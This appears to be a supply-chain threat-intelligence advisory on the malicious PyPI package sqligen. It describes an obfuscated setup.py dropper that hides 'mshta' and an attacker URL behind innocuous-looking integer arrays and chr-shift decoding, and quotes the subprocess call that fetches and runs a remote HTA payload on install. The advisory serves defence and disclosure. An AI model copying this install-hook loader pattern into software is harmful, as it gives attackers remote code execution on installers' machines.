Supply-chain threat intelligence

Incident detail

criticalpypi·obfuscation·osv

Malicious code in sqligen (PyPI)

sqligen

Risk score

92

AI summary

Indexed incident for sqligen (pypi).

Description

setup.py contains an obfuscated install-time dropper that fires on Windows. Two functions with diagnostic-sounding names ('GetDefaultSystemPolicy' / 'CalculateNodeDrift', backed by integer arrays presented as 'InterruptThresholds' and 'ThreadPingLatencies') decode via chr(value+14) arithmetic to the strings 'mshta' and 'https://fixars.top'. On Windows, GetGitCommitHash() runs subprocess.check_output(['mshta', 'https://fixars.top'], shell=True), executing an arbitrary remote HTA payload from fixars.top. This codepath is reached from CustomInstallCommand, CustomBuildPyCommand, and CustomDevelopCommand, so any pip install sqligen (or pip install -e.) on a Windows host triggers remote code execution under the installing user's account. The obfuscation (cover-story variable names, chr-shift encoding of the command and URL) demonstrates intentional evasion of source review; legitimate build tooling does not encode 'mshta' as 'hardware interrupt latency thresholds'. The fetched payload is attacker-controlled and unrelated to the package's stated SQL-generation purpose.

During installation, the code attempts to download and start a malicious executable.

Likely related to 2025-08-raknet-testing-package.


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-easyaillm

Reasons (based on the campaign):

  • Downloads and executes a remote executable.

  • obfuscation

  • malware

  • tool:mshta

Technical details

Affected versions

=1.0.0=1.0.5=1.0.6=1.0.7=1.0.8=1.1.1=1.1.3=1.1.4>=0

Indicators

  • affected version=1.0.075%
  • affected version=1.0.575%
  • affected version=1.0.675%
  • affected version=1.0.775%
  • affected version=1.0.875%
  • affected version=1.1.175%
  • affected version=1.1.375%
  • affected version=1.1.475%
  • affected version>=075%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents